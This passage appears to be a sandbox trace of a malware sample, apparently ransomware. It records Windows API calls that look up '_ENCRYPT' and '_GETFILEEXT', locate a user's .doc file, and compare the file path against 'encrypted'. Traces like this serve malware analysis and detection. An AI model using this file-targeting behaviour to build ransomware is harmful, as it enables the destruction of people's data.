hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.087] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.087] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.088] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.088] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.088] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.088] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.088] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.088] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x802a9bb0, ftLastWriteTime.dwHighDateTime=0x1d5c300, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0x7c20c0 [0034.088] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x802a9bb0, ftLastWriteTime.dwHighDateTime=0x1d5c300, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0x7c20c0 [0034.088] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eLJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LJ7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pQzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qzi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 